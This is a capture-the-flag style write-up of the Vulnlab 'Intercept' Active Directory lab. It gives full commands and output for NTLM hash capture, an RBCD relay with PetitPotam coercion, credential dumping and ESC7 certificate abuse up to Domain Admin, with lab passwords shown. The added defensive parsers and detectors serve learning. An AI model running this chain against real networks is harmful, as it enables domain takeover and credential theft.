Vulnlab Intercept

Intercept is a hard-rated chain consisting of two machines, WS01 and DC01. The chain starts with forced authentication via a file upload to grab a user's NetNTLMv2 hash. With this user we perform the Resource-Based Constrained Delegation (RBCD) WebClient attack to escalate privileges on WS01. Finally, using ESC7 we elevate privileges to Domain Admin.


$ smbclient -L \\\\ws01.intercept.vl
Password for [WORKGROUP\puck]:

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    dev             Disk      shared developer workspace
    IPC$            IPC       Remote IPC
    Users           Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to ws01.intercept.vl failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Upload files to the SMB share and capture the resulting NTLM authentication with smbserver.py or Responder:

$ impacket-smbserver share share -smb2support
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.250.118,63690)
[*] AUTHENTICATE_MESSAGE (INTERCEPT\Kathryn.Spencer,WS01)
[*] User WS01\Kathryn.Spencer authenticated successfully
[*] Kathryn.Spencer::INTERCEPT:aaaaaaaaaaaaaaaa:3737678866bc6c44728f496ace58b114:01010000000000008055d8e29dfeda01350bcbc48ec2e8230000000001001000520058006b004200550077007300630003001000520058006b0042005500770073006300020010006b00410053007600490063004d006e00040010006b00410053007600490063004d006e00070008008055d8e29dfeda0106000400020000000800300030000000000000000000000000200000e7ded09557c36a93b2b02ef519d8e02660849fc8954d8c72827bfb1b0d13774a0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0032002e003100330038000000000000000000
[*] Connecting Share(1:IPC$)
[-] SMB2_TREE_CONNECT not found x


$ smbclient \\\\ws01.intercept.vl\\dev

Next we crack the hash.

The hashcat mode for NetNTLMv2 hashes is 5600; you can find it on the hashcat example hashes page.

hashcat -a 0 -m 5600 hash.txt /usr/share/wordlists/rockyou.txt -o cracked
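To see what a line in that format actually carries, here is an added example (mine, not part of the original write-up) that splits the captured line above into its hashcat 5600 fields and decodes the NTLMv2 blob's AV pairs according to the MS-NLMP layout. The only input is the line smbserver.py printed, re-split by structure for readability. The MsvAvTargetName pair is the interesting one for a defender: it records the service and host the client believed it was authenticating to, here the attacker's IP over cifs rather than a domain host.

```python
import struct
from datetime import datetime, timedelta, timezone

# The hash line impacket-smbserver printed above, in the user::domain:challenge:proof:blob
# layout that hashcat mode 5600 consumes; the blob is split by structure for readability.
CAPTURED = (
    "Kathryn.Spencer::INTERCEPT:aaaaaaaaaaaaaaaa:3737678866bc6c44728f496ace58b114:"
    "0101000000000000"                               # RespType, HiRespType, Reserved1, Reserved2
    "8055d8e29dfeda01"                               # TimeStamp (FILETIME, little-endian)
    "350bcbc48ec2e823"                               # ChallengeFromClient
    "00000000"                                       # Reserved3
    "01001000" "520058006b0042005500770073006300"    # MsvAvNbComputerName
    "03001000" "520058006b0042005500770073006300"    # MsvAvDnsComputerName
    "02001000" "6b00410053007600490063004d006e00"    # MsvAvNbDomainName
    "04001000" "6b00410053007600490063004d006e00"    # MsvAvDnsDomainName
    "07000800" "8055d8e29dfeda01"                    # MsvAvTimestamp
    "06000400" "02000000"                            # MsvAvFlags
    "08003000" "30000000" "00000000" "00000000" "00200000"            # MsvAvSingleHost header
    "e7ded09557c36a93b2b02ef519d8e02660849fc8954d8c72827bfb1b0d13774a"  # MsvAvSingleHost MachineID
    "0a001000" "00000000" "00000000" "00000000" "00000000"            # MsvAvChannelBindings
    "09001e00" "63006900660073002f00310030002e0038002e0032002e00310033003800"  # MsvAvTargetName
    "00000000" "00000000"                            # MsvAvEOL plus 4 trailing zero bytes
)

# AV_PAIR ids from MS-NLMP section 2.2.2.1
AV_NAMES = {1: "MsvAvNbComputerName", 2: "MsvAvNbDomainName", 3: "MsvAvDnsComputerName",
            4: "MsvAvDnsDomainName", 5: "MsvAvDnsTreeName", 6: "MsvAvFlags",
            7: "MsvAvTimestamp", 8: "MsvAvSingleHost", 9: "MsvAvTargetName",
            10: "MsvAvChannelBindings"}
UTF16_AV_IDS = {1, 2, 3, 4, 5, 9}


def filetime_to_datetime(filetime: int) -> datetime:
    """FILETIME counts 100 ns ticks since 1601-01-01 UTC."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=filetime // 10)


def parse_netntlmv2_line(line: str) -> dict:
    """Split a hashcat-5600 line into its fields and decode the NTLMv2 client blob."""
    fields = line.strip().split(":", 5)
    if len(fields) != 6 or fields[1] != "":
        raise ValueError("expected user::domain:challenge:proof:blob")
    user, _, domain, server_challenge, nt_proof, blob_hex = fields
    if len(server_challenge) != 16 or len(nt_proof) != 32:
        raise ValueError("server challenge is 8 bytes and NTProofStr 16 bytes, hex encoded")
    blob = bytes.fromhex(blob_hex)
    if blob[:2] != b"\x01\x01":
        raise ValueError("blob lacks the NTLMv2 RespType/HiRespType marker")
    (filetime,) = struct.unpack_from("<Q", blob, 8)
    client_challenge = blob[16:24]
    av_pairs, pos = {}, 28          # AV pairs start after the 4 reserved bytes at offset 24
    while True:
        av_id, av_len = struct.unpack_from("<HH", blob, pos)
        pos += 4
        value = blob[pos:pos + av_len]
        pos += av_len
        if av_id == 0:              # MsvAvEOL
            break
        if av_id in UTF16_AV_IDS:
            value = value.decode("utf-16-le")
        elif av_id == 6:
            (value,) = struct.unpack("<I", value)
        elif av_id == 7:
            (value,) = struct.unpack("<Q", value)
        else:
            value = value.hex()
        av_pairs[AV_NAMES.get(av_id, f"MsvAvUnknown_{av_id:#06x}")] = value
    return {
        "user": user, "domain": domain,
        "server_challenge": server_challenge, "nt_proof_str": nt_proof,
        "timestamp": filetime_to_datetime(filetime),
        "client_challenge": client_challenge.hex(),
        "av_pairs": av_pairs,
    }


def describe_capture(parsed: dict) -> list:
    """What the victim's response reveals about the session it was produced for."""
    av, notes = parsed["av_pairs"], []
    if "MsvAvTargetName" in av:
        notes.append(f"client targeted {av['MsvAvTargetName']} "
                     f"at {parsed['timestamp']:%Y-%m-%d %H:%M:%S} UTC")
    if av.get("MsvAvChannelBindings", "x").strip("0") == "":
        notes.append("channel binding token is all zeros: response is not tied to a TLS session")
    if av.get("MsvAvFlags", 0) & 0x2:
        notes.append("MsvAvFlags bit 0x2 set: client included a MIC over the NTLM exchange")
    return notes
```

Running parse_netntlmv2_line(CAPTURED) gives the target name cifs/10.8.2.138, the client timestamp (early September 2024) and the random NetBIOS names smbserver.py advertised, which the client simply echoed back; the NTProofStr and server challenge are the two values hashcat combines with candidate passwords.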

Try spraying the password on the other domain users:

ldapsearch -x -LLL -H ldap://dc01.intercept.vl -D 'kathryn.spencer@intercept.vl' -b 'DC=intercept,DC=vl' -w 'Chocolate1' | grep userPrincipalName | awk '{print $2}' | cut -d '@' -f 1 > allusers.txt

netexec smb ws01.intercept.vl -u allusers.txt -p Chocolate1 --continue-on-success

But this yields no result.

I also use ldapdomaindump to dump domain information in HTML format:

python -m ldapdomaindump -u 'intercept.vl\Kathryn.Spencer' -p 'Chocolate1' -o ldap/ 10.10.145.245

Next we collect data for BloodHound analysis:

$ bloodhound-python -c all --disable-pooling -w 1 -u kathryn.spencer -p 'Chocolate1' -d intercept.vl -dc dc01.intercept.vl -ns 10.10.145.245 --dns-tcp --zip --dns-timeout 120


Check LDAP signing [ not enforced = default ]

$ netexec ldap 10.10.250.117 -u kathryn.spencer -p Chocolate1 -M ldap-checker 
SMB         10.10.250.117   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:intercept.vl) (signing:True) (SMBv1:False)
LDAP        10.10.250.117   389    DC01             [+] intercept.vl\kathryn.spencer:Chocolate1 
LDAP-CHE... 10.10.250.117   389    DC01             LDAP Signing NOT Enforced!
LDAP-CHE... 10.10.250.117   389    DC01             LDAPS Channel Binding is set to "NEVER"

Check Machine Quota [ 10 = default ]

$ netexec ldap 10.10.250.117 -u kathryn.spencer -p Chocolate1 -M maq         
SMB         10.10.250.117   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:intercept.vl) (signing:True) (SMBv1:False)
LDAP        10.10.250.117   389    DC01             [+] intercept.vl\kathryn.spencer:Chocolate1 
MAQ         10.10.250.117   389    DC01             [*] Getting the MachineAccountQuota
MAQ         10.10.250.117   389    DC01             MachineAccountQuota: 10

Check whether the WebDAV (WebClient) service is enabled [ enabled = not default ]

$ netexec ldap 10.10.250.117 -u kathryn.spencer -p Chocolate1 -M webdav


RBCD WebClient Attack

Now that we know that the WebDAV service is active on WS01, that LDAP signing is not enforced on the DC, and that we can add machine accounts to the domain, we can abuse these conditions together with coerced authentication to escalate privileges. However, when relaying the coerced authentication to add RBCD permissions on WS01, the authenticated connection has to originate from a host in the trusted intranet zone. Luckily for us, by default the “Authenticated Users” group can create child objects in the ADIDNS zone.
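As an added example (not from the original post), the following script turns the netexec lines from the checks above into a verdict on whether this chain is possible, and names the setting that closes each step. It also reads the SMB banner: signing is required on DC01, so SMB is not a relay target, which is why the relay goes to LDAPS instead. The webdav line for WS01 is constructed, and its wording is my assumption about that module's output; the hardening settings named are the standard ones (the LDAP server signing policy, LdapEnforceChannelBinding, ms-DS-MachineAccountQuota, and the WebClient service).

```python
import re

# Constructed sample: the netexec lines from the checks above (SMB banner, ldap-checker, maq),
# plus a webdav line for WS01 whose wording is an assumption about that module's output.
NETEXEC_OUTPUT = """\
SMB         10.10.250.117   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:intercept.vl) (signing:True) (SMBv1:False)
LDAP-CHE... 10.10.250.117   389    DC01             LDAP Signing NOT Enforced!
LDAP-CHE... 10.10.250.117   389    DC01             LDAPS Channel Binding is set to "NEVER"
MAQ         10.10.250.117   389    DC01             MachineAccountQuota: 10
WEBDAV      10.10.250.118   445    WS01             WebClient Service enabled on: 10.10.250.118
"""


def audit_relay_preconditions(output: str) -> dict:
    """Pull the settings that decide where an NTLM relay can land out of netexec output."""
    state = {
        "smb_signing_required": None,     # None means the check was not seen in the output
        "ldap_signing_enforced": None,
        "ldaps_channel_binding": None,
        "machine_account_quota": None,
        "webclient_hosts": [],
    }
    for line in output.splitlines():
        if line.startswith("SMB") and (m := re.search(r"\(signing:(True|False)\)", line)):
            state["smb_signing_required"] = m.group(1) == "True"
        if "LDAP Signing NOT Enforced" in line:
            state["ldap_signing_enforced"] = False
        if m := re.search(r'LDAPS Channel Binding is set to "([A-Z ]+)"', line):
            state["ldaps_channel_binding"] = m.group(1)
        if m := re.search(r"MachineAccountQuota:\s*(\d+)", line):
            state["machine_account_quota"] = int(m.group(1))
        if m := re.search(r"WebClient Service enabled on:\s*(\S+)", line):
            state["webclient_hosts"].append(m.group(1))
    return state


def open_relay_paths(state: dict) -> dict:
    """Map each weak setting to the relay step it enables and the hardening that closes it."""
    paths = {}
    if state["smb_signing_required"] is False:
        paths["relay_to_smb"] = "SMB signing not required; fix: require SMB signing"
    if state["ldap_signing_enforced"] is False:
        paths["relay_to_ldap"] = ("LDAP signing not enforced; fix: "
                                  "'Domain controller: LDAP server signing requirements' = Require signing")
    if state["ldaps_channel_binding"] == "NEVER":
        paths["relay_to_ldaps"] = ("no LDAPS channel binding; fix: "
                                   "NTDS\\Parameters\\LdapEnforceChannelBinding = 2 (Always)")
    if (state["machine_account_quota"] or 0) > 0:
        paths["add_machine_account"] = (f"MachineAccountQuota={state['machine_account_quota']}; "
                                        "fix: set ms-DS-MachineAccountQuota to 0")
    for host in state["webclient_hosts"]:
        paths[f"webdav_auth_from:{host}"] = ("WebClient service running; "
                                             "fix: disable the WebClient (WebDAV) service")
    return paths


def rbcd_webclient_chain_possible(state: dict) -> bool:
    """The chain needs an LDAP(S) relay target, a non-zero machine quota, and a WebClient host."""
    paths = open_relay_paths(state)
    ldap_reachable = "relay_to_ldap" in paths or "relay_to_ldaps" in paths
    return ldap_reachable and "add_machine_account" in paths and bool(state["webclient_hosts"])
```

Any one of the three fixes breaks the chain as run here: enforcing LDAP signing and channel binding removes the relay target, a zero machine quota removes the account to delegate to, and a stopped WebClient service means the coerced authentication never becomes HTTP.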

 

Preparing

$ python3 -m venv venv
$ source venv/bin/activate
$ pip install ldap3 dnspython
$ pip install ldapdomaindump
$ git clone https://github.com/CoreSecurity/impacket.git
$ cd impacket
$ python setup.py install
┌──(venv)─(puck㉿kali)-[~/vulnlab/intercept/impacket]
└─$ ntlmrelayx.py -t ldaps://10.10.250.117 --delegate-access -smb2support
└─$ deactivate


$ git clone https://github.com/dirkjanm/krbrelayx.git


Here it goes.

Set your local DNS server to the DC's IP in /etc/resolv.conf before running the next steps:

┌──(puck㉿kali)-[~/vulnlab/intercept]
└─$ cat /etc/resolv.conf 
# Generated by NetworkManager
search home
nameserver 10.10.177.37


Add a new DNS entry that points to our attacker machine:

$ python3 ./krbrelayx/dnstool.py -u 'INTERCEPT.vl\Kathryn.Spencer' dc01.intercept.vl --tcp -p Chocolate1 -a add -t A -r kali.intercept.vl -d 10.8.2.138
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully


Verify that the A record for our attacker machine was created:

$ nslookup kali.intercept.vl 10.10.177.37      
Server:		10.10.177.37
Address:	10.10.177.37#53

Name:	kali.intercept.vl
Address: 10.8.2.138

 

Add a new machine account:

┌──(venv)─(puck㉿kali)-[~/vulnlab/intercept]
└─$ impacket-addcomputer -computer-name 'WS02$' -computer-pass 'Start123!' -dc-host dc01.intercept.vl -domain-netbios intercept  'INTERCEPT/Kathryn.Spencer:Chocolate1'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Successfully added machine account WS02$ with password Start123!.


Start the listener that relays the authentication to LDAPS on the DC in order to configure RBCD on WS01$ (a computer account is allowed to write its own delegation attribute):

┌──(venv)─(puck㉿kali)-[~/vulnlab/intercept]
└─$ sudo impacket-ntlmrelayx -smb2support -t ldaps://dc01.intercept.vl --http-port 8080 --delegate-access --escalate-user WS02\$ --no-dump --no-acl --no-da
[sudo] password for puck: 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Protocol Client DCSYNC loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 8080
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
[*] HTTPD(8080): Connection from 10.10.177.38 controlled, attacking target ldaps://dc01.intercept.vl
[*] HTTPD(8080): Authenticating against ldaps://dc01.intercept.vl as INTERCEPT/WS01$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(8080): Connection from 10.10.177.38 controlled, but there are no more targets left!
[*] Delegation rights modified succesfully!
[*] WS02$ can now impersonate users on WS01$ via S4U2Proxy
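What ntlmrelayx just changed is the msDS-AllowedToActOnBehalfOfOtherIdentity attribute on WS01$: a binary security descriptor whose DACL lists the principals trusted to act on WS01$'s behalf. The added example below (mine, not impacket's code) builds such a descriptor for a constructed WS02$ SID and parses it back the way a monitoring script diffing that attribute would, so that a write like the one above surfaces as "new SID trusted for delegation". The descriptor is simplified (no owner, group or SACL), the SID is made up, and the access mask is the conventional full-control value.

```python
import struct

# Constructed SID for the example; a real one would be read from the WS02$ object in AD.
WS02_SID = "S-1-5-21-1111111111-2222222222-3333333333-1104"

ACCESS_ALLOWED_ACE_TYPE = 0x00
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
FULL_CONTROL = 0x000F01FF     # access mask conventionally granted in this attribute's ACEs


def sid_to_bytes(sid: str) -> bytes:
    """Encode S-R-A-S1-S2... into the binary SID layout."""
    parts = sid.split("-")
    if parts[0] != "S" or len(parts) < 3:
        raise ValueError(f"not a SID: {sid}")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (bytes([revision, len(subs)]) + authority.to_bytes(6, "big")
            + b"".join(s.to_bytes(4, "little") for s in subs))


def bytes_to_sid(data: bytes, pos: int) -> str:
    """Decode a binary SID starting at data[pos]."""
    revision, count = data[pos], data[pos + 1]
    authority = int.from_bytes(data[pos + 2:pos + 8], "big")
    subs = struct.unpack_from(f"<{count}I", data, pos + 8)
    return "-".join(["S", str(revision), str(authority), *map(str, subs)])


def build_rbcd_descriptor(allowed_sids: list) -> bytes:
    """Self-relative descriptor with one ACCESS_ALLOWED ACE per principal, the shape
    msDS-AllowedToActOnBehalfOfOtherIdentity takes (simplified: no owner, group or SACL)."""
    aces = b""
    for sid in allowed_sids:
        sid_bytes = sid_to_bytes(sid)
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_bytes), FULL_CONTROL)
        aces += sid_bytes
    # ACL header is 8 bytes: revision, sbz1, size, ace count, sbz2
    acl = struct.pack("<BBHHH", 2, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    # 20-byte SD header: revision, sbz1, control, owner/group/sacl offsets (0), dacl offset (20)
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE, 0, 0, 0, 20)
    return header + acl


def allowed_to_act_sids(descriptor: bytes) -> list:
    """SIDs granted by ACCESS_ALLOWED ACEs in the descriptor's DACL; empty if unset."""
    if not descriptor:
        return []
    _rev, _sbz1, control, _owner, _group, _sacl, off_dacl = struct.unpack_from("<BBHIIII", descriptor, 0)
    if not control & SE_DACL_PRESENT or off_dacl == 0:
        return []
    _acl_rev, _sbz2, _acl_size, ace_count, _sbz3 = struct.unpack_from("<BBHHH", descriptor, off_dacl)
    sids, pos = [], off_dacl + 8
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", descriptor, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sids.append(bytes_to_sid(descriptor, pos + 8))   # mask occupies bytes 4..8 of the ACE
        pos += ace_size
    return sids


def detect_new_delegation(before: bytes, after: bytes) -> list:
    """Principals newly trusted to act on behalf of the computer: what a change alert on
    msDS-AllowedToActOnBehalfOfOtherIdentity should report."""
    return sorted(set(allowed_to_act_sids(after)) - set(allowed_to_act_sids(before)))


if __name__ == "__main__":
    before = b""                                   # attribute was empty on WS01$
    after = build_rbcd_descriptor([WS02_SID])      # state after the relay wrote it
    print("newly delegated:", detect_new_delegation(before, after))
```

In a real deployment the before/after values come from the attribute itself (for instance from a directory change notification or event 5136 on the DC); the detection logic is the same as in detect_new_delegation.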

Coerce authentication from the workstation WS01$ using a non-default port so that it becomes a WebDAV (HTTP) authentication:

┌──(puck㉿kali)-[~/vulnlab/intercept]
└─$ python3 ./krbrelayx/PetitPotam.py -d intercept.vl -u 'Kathryn.Spencer' -p 'Chocolate1' kali@8080/a ws01.intercept.vl    

                                         
              PoC to elicit machine account authentication via some MS-EFSRPC functions
                                      by topotam (@topotam77)
      
                     Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN


Trying pipe lsarpc
[-] Connecting to ncacn_np:ws01.intercept.vl[\PIPE\lsarpc]
[+] Connected!
[+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!
[+] OK! Using unpatched function!
[-] Sending EfsRpcEncryptFileSrv!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!

Impersonate Administrator on WS01 using our RBCD privileges:

┌──(puck㉿kali)-[~/vulnlab/intercept]
└─$ impacket-getST -spn cifs/ws01.intercept.vl intercept.vl/WS02\$ -impersonate administrator
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:Start123!
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_ws01.intercept.vl@INTERCEPT.VL.ccache


$ export KRB5CCNAME=administrator@cifs_ws01.intercept.vl@INTERCEPT.VL.ccache


$ impacket-secretsdump -k -no-pass ws01.intercept.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x04718518c7f81484a5ba5cc7f16ca912
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:83<redacted>82:::
..snip..
[*] _SC_HelpdeskService 
Simon.Bowen@intercept.vl:b0OI_fHO859+Aw
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry

What a ride

Next

Using Certipy to enumerate AD CS, we see that one of the groups holding the ManageCA permission on the CA is the ca-managers group, over which simon.bowen has GenericAll permissions.

$ certipy-ad find -username 'Simon.Bowen' -password 'b0OI_fHO859+Aw' -vulnerable -dc-ip 10.10.145.245 -stdout            
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'intercept-DC01-CA' via CSRA
[*] Got CA configuration for 'intercept-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : intercept-DC01-CA
    DNS Name                            : DC01.intercept.vl
    Certificate Subject                 : CN=intercept-DC01-CA, DC=intercept, DC=vl
    Certificate Serial Number           : 4CEE597D2BE3DC9E4F5CDA8401EA6373
    Certificate Validity Start          : 2023-06-27 13:24:59+00:00
    Certificate Validity End            : 2124-09-05 07:48:03+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : INTERCEPT.VL\Administrators
      Access Rights
        Enroll                          : INTERCEPT.VL\Authenticated Users
        ManageCa                        : INTERCEPT.VL\ca-managers
                                          INTERCEPT.VL\Domain Admins
                                          INTERCEPT.VL\Enterprise Admins
                                          INTERCEPT.VL\Administrators
        ManageCertificates              : INTERCEPT.VL\Domain Admins
                                          INTERCEPT.VL\Enterprise Admins
                                          INTERCEPT.VL\Administrators
    [!] Vulnerabilities
      ESC7                              : 'INTERCEPT.VL\\ca-managers' has dangerous permissions
Certificate Templates                   : [!] Could not find any certificate templates
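As an added example (not Certipy's code), this parser reads the "Access Rights" block of the output above and flags every principal holding ManageCa or ManageCertificates that is not one of the built-in admin groups, which is the ESC7 condition Certipy reported. The sample text is the block above, trimmed, and the set of expected principals is an assumption a site would tune to its own CA delegation.

```python
# Constructed from the "Certificate Authorities" block of the Certipy output above (trimmed).
CERTIPY_OUTPUT = r"""
Certificate Authorities
  0
    CA Name                             : intercept-DC01-CA
    DNS Name                            : DC01.intercept.vl
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Permissions
      Owner                             : INTERCEPT.VL\Administrators
      Access Rights
        Enroll                          : INTERCEPT.VL\Authenticated Users
        ManageCa                        : INTERCEPT.VL\ca-managers
                                          INTERCEPT.VL\Domain Admins
                                          INTERCEPT.VL\Enterprise Admins
                                          INTERCEPT.VL\Administrators
        ManageCertificates              : INTERCEPT.VL\Domain Admins
                                          INTERCEPT.VL\Enterprise Admins
                                          INTERCEPT.VL\Administrators
    [!] Vulnerabilities
      ESC7                              : 'INTERCEPT.VL\\ca-managers' has dangerous permissions
"""

# Groups expected to hold CA management rights; anything else is a finding (tune per site).
EXPECTED_CA_ADMINS = {"domain admins", "enterprise admins", "administrators"}

# What each CA right lets its holder do, as the steps below demonstrate.
RIGHT_IMPACT = {
    "ManageCa": "can add itself as a certificate officer and enable templates such as SubCA",
    "ManageCertificates": "can issue requests the CA would otherwise leave pending or denied",
}


def parse_ca_access_rights(text: str) -> dict:
    """Return {right: [principal, ...]} from the indented 'Access Rights' block."""
    rights, current, in_block = {}, None, False
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Access Rights":
            in_block = True
            continue
        if not in_block:
            continue
        if not line or line.startswith("[!]") or line.startswith("Certificate Templates"):
            break
        if ":" in line:                     # "Right : first principal"
            right, principal = (part.strip() for part in line.split(":", 1))
            current = right
            rights.setdefault(current, []).append(principal)
        elif current:                       # continuation line carrying only a principal
            rights[current].append(line)
    return rights


def account_name(principal: str) -> str:
    """'INTERCEPT.VL\\ca-managers' -> 'ca-managers' (case-folded for comparison)."""
    return principal.split("\\", 1)[-1].lower()


def esc7_exposure(rights: dict) -> list:
    """(right, principal) pairs for non-default holders of ManageCa / ManageCertificates."""
    findings = []
    for right in ("ManageCa", "ManageCertificates"):
        for principal in rights.get(right, []):
            if account_name(principal) not in EXPECTED_CA_ADMINS:
                findings.append((right, principal))
    return findings


def report(text: str) -> list:
    """Human-readable lines for each finding, including what the right enables."""
    return [f"{principal} holds {right}: {RIGHT_IMPACT[right]}"
            for right, principal in esc7_exposure(parse_ca_access_rights(text))]
```

The check is deliberately about principals, not about Certipy's own verdict line: once ca-managers is on the list, the next question for a defender is who can become a member of that group, which is exactly the path simon.bowen takes next.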


Since simon.bowen is a member of a group that has control over the ca-managers group, he can add himself to that group:

net rpc group addmem "ca-managers" "Simon.Bowen" -U "intercept.vl"/"Simon.Bowen"%"<simon's password :)>" -S <dc01 IP>


ESC 7 Exploitation

Now that we have a user with the ManageCA permission on the CA, we can abuse ESC7.

Add the user as a certificate officer:

$ certipy-ad ca -ca 'intercept-DC01-CA' -username 'Simon.Bowen@intercept.vl' -password 'b0OI_fHO859+Aw' -dc-ip '10.10.145.245' -add-officer  simon.bowen 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully added officer 'Simon.Bowen' on 'intercept-DC01-CA'

Enable the SubCA template. This template is configured by default to allow client authentication, so we enable it so that it can be used:

$ certipy-ad ca -ca 'intercept-DC01-CA' -username 'Simon.Bowen@intercept.vl' -password 'b0OI_fHO859+Aw' -dc-ip '10.10.145.245' -enable-template SubCA
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully enabled 'SubCA' on 'intercept-DC01-CA'

Now request a certificate with the userPrincipalName (UPN) of the Administrator.

  • This request will be denied automatically; however, since Simon is an officer, we can issue the certificate manually.

$ certipy-ad req -username 'Simon.Bowen@intercept.vl' -password 'b0OI_fHO859+Aw' -dc-ip '10.10.145.245' -ca 'intercept-DC01-CA' -template SubCA -upn 'Administrator@intercept.vl' 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 6
Would you like to save the private key? (y/N) y
[*] Saved private key to 6.key
[-] Failed to request certificate

Issue the request

$ certipy-ad ca -ca 'intercept-DC01-CA' -username 'Simon.Bowen@intercept.vl' -password 'b0OI_fHO859+Aw' -dc-ip '10.10.145.245' -issue-request 6                                  
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully issued certificate

Get the certificate

$ certipy-ad req -username 'Simon.Bowen@intercept.vl' -password 'b0OI_fHO859+Aw' -dc-ip '10.10.145.245' -ca 'intercept-DC01-CA' -retrieve 6  
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Rerieving certificate with ID 6
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'Administrator@intercept.vl'
[*] Certificate has no object SID
[*] Loaded private key from '6.key'
[*] Saved certificate and private key to 'administrator.pfx'

Authenticate with the PFX to the DC

$ certipy-ad auth -pfx administrator.pfx -domain intercept.vl -username administrator -dc-ip '10.10.145.245'         
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@intercept.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@intercept.vl': aad3b435b51404eeaad3b435b51404ee:ad<redacted>1f

Check:

$ netexec smb dc01.intercept.vl -u Administrator -H ad<redacted>1f 


$ evil-winrm -i 10.10.145.245 -u Administrator -H 'ad<redacted>1f'

This was super fun.

Resources